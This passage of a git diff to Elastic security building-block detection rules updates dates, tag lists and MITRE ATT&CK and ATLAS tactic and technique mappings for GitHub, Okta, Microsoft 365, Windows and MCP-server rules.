Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,17 +30,21 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.repo"] diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml index 0b5f2635db1..a21707d6f12 100644 --- a/rules_building_block/execution_github_repo_created.toml +++ b/rules_building_block/execution_github_repo_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "GitHub Repo Created" risk_score = 21 rule_id = "6cea88e4-6ce2-4238-9981-a54c140d6336" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Resource Development", "Data Source: Github"] timestamp_override = "event.ingested" type = "eql" @@ -35,14 +28,18 @@ configuration where event.dataset == "github.audit" and event.action == "repo.cr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1583" +name = "Acquire Infrastructure" +reference = "https://attack.mitre.org/techniques/T1583/" +[[rule.threat.technique.subtechnique]] +id = "T1583.006" +name = "Web Services" +reference = "https://attack.mitre.org/techniques/T1583/006/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml index 33a822c8378..4c857b6a80f 100644 --- a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml +++ b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of GitHub Repo Interaction From a New IP" risk_score = 21 rule_id = "0294f105-d7af-4a02-ae90-35f56763ffa2" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,17 +30,21 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["github.repo", "github.actor_ip"] diff --git a/rules_building_block/execution_linux_segfault.toml b/rules_building_block/execution_linux_segfault.toml index e1d006ca679..50dbe75c7ed 100644 --- a/rules_building_block/execution_linux_segfault.toml +++ b/rules_building_block/execution_linux_segfault.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,11 +55,3 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/execution_mcp_server_child_process.toml b/rules_building_block/execution_mcp_server_child_process.toml index 12629a21bf0..c29262c19e5 100644 --- a/rules_building_block/execution_mcp_server_child_process.toml +++ b/rules_building_block/execution_mcp_server_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,14 +121,26 @@ process where event.type == "start" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0053" +name = "AI Agent Tool Invocation" +reference = "https://atlas.mitre.org/techniques/AML.T0053/" + +[rule.threat.tactic] +id = "AML.TA0005" +name = "Execution" +reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml index 1c014464624..5ca6627651a 100644 --- a/rules_building_block/execution_settingcontent_ms_file_creation.toml +++ b/rules_building_block/execution_settingcontent_ms_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = ["https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f risk_score = 21 rule_id = "1e6363a6-3af5-41d4-b7ea-d475389c0ceb" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" @@ -46,36 +37,31 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/execution_unsigned_service_executable.toml b/rules_building_block/execution_unsigned_service_executable.toml index 3a861c4ab50..ffcabcb5d95 100644 --- a/rules_building_block/execution_unsigned_service_executable.toml +++ b/rules_building_block/execution_unsigned_service_executable.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Execution of an Unsigned Service" risk_score = 21 rule_id = "56fdfcf1-ca7c-4fd9-951d-e215ee26e404" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "new_terms" @@ -42,39 +34,21 @@ not process.code_signature.status : (errorCode_endpoint* or "errorChaining") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "user.id"] diff --git a/rules_building_block/impact_github_pat_access_revoked.toml b/rules_building_block/impact_github_pat_access_revoked.toml index f94c6f93197..3d5e9ef049b 100644 --- a/rules_building_block/impact_github_pat_access_revoked.toml +++ b/rules_building_block/impact_github_pat_access_revoked.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -33,16 +33,3 @@ configuration where event.dataset == "github.audit" and event.action == "persona ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml index 2e625988a7e..f73cc4350e5 100644 --- a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml +++ b/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/12/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,31 +87,31 @@ network where http.request.method == "POST" and http.response.status_code != 200 [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml index b441c6147ea..51618b8cec8 100644 --- a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml +++ b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of IP Address For GitHub Personal Access Token (PAT)" risk_score = 21 rule_id = "fc909baa-fb34-4c46-9691-be276ef4234c" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Initial Access", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,22 +30,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.actor_ip"] diff --git a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml index 8f55ee6ca9d..1479b9622dc 100644 --- a/rules_building_block/initial_access_microsoft_air_investigation_signal.toml +++ b/rules_building_block/initial_access_microsoft_air_investigation_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,27 +51,3 @@ event.dataset:o365.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml index 168d55055ce..e0e39924ce2 100644 --- a/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_alerts_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,24 +57,3 @@ event.dataset:o365.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml index fc9e62e6053..25dca76688d 100644 --- a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/08/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,20 +73,7 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Defender", - "Data Source: Microsoft Defender for Office 365", - "Data Source: Microsoft Threat Intelligence", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Defender", "Data Source: Microsoft Defender for Office 365", "Data Source: Microsoft Threat Intelligence", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -98,26 +85,13 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml index 6126e019db1..ab6d84d3a15 100644 --- a/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml +++ b/rules_building_block/initial_access_microsoft_purview_security_compliance_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/04" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,39 +55,3 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/initial_access_new_okta_authentication_behavior.toml b/rules_building_block/initial_access_new_okta_authentication_behavior.toml index 3333bc42b4d..c5fc2bc4b00 100644 --- a/rules_building_block/initial_access_new_okta_authentication_behavior.toml +++ b/rules_building_block/initial_access_new_okta_authentication_behavior.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,8 +76,17 @@ event.dataset:okta.system and okta.debug_context.debug_data.risk_behaviors:* [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml index 38c577a2179..cc03ed2a61a 100644 --- a/rules_building_block/initial_access_okta_admin_console_login_failure.toml +++ b/rules_building_block/initial_access_okta_admin_console_login_failure.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/03" integration = ["okta"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ references = [ risk_score = 21 rule_id = "f960e8a4-31c1-4a6e-b172-8f5c8e5c8c2a" severity = "low" -tags = [ - "Domain: Identity", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Tactic: Initial Access", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Rule Type: BBR", -] +tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -81,26 +72,13 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/lateral_movement_at.toml b/rules_building_block/lateral_movement_at.toml index ddedfe457c3..463fc4d11a7 100644 --- a/rules_building_block/lateral_movement_at.toml +++ b/rules_building_block/lateral_movement_at.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,16 +26,7 @@ name = "At.exe Command Lateral Movement" risk_score = 21 rule_id = "b483365c-98a8-40c0-92d8-0458ca25058a" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -46,36 +37,31 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml index 444d49ece7f..aca164ce61f 100644 --- a/rules_building_block/lateral_movement_posh_winrm_activity.toml +++ b/rules_building_block/lateral_movement_posh_winrm_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,36 +83,36 @@ case_insensitive = true value = "?:\\\\ExchangeServer\\\\bin*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.006" -name = "Windows Remote Management" -reference = "https://attack.mitre.org/techniques/T1021/006/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.006" +name = "Windows Remote Management" +reference = "https://attack.mitre.org/techniques/T1021/006/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml index dbc9fce692a..79380de7439 100644 --- a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml +++ b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -24,15 +24,7 @@ references = [ risk_score = 21 rule_id = "e74d645b-fec6-431e-bf93-ca64a538e0de" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -78,31 +70,31 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.001" name = "SQL Stored Procedures" reference = "https://attack.mitre.org/techniques/T1505/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml index 75ac81fc7f1..79969f690ec 100644 --- a/rules_building_block/lateral_movement_wmic_remote.toml +++ b/rules_building_block/lateral_movement_wmic_remote.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,17 +26,7 @@ name = "WMIC Remote Command" risk_score = 21 rule_id 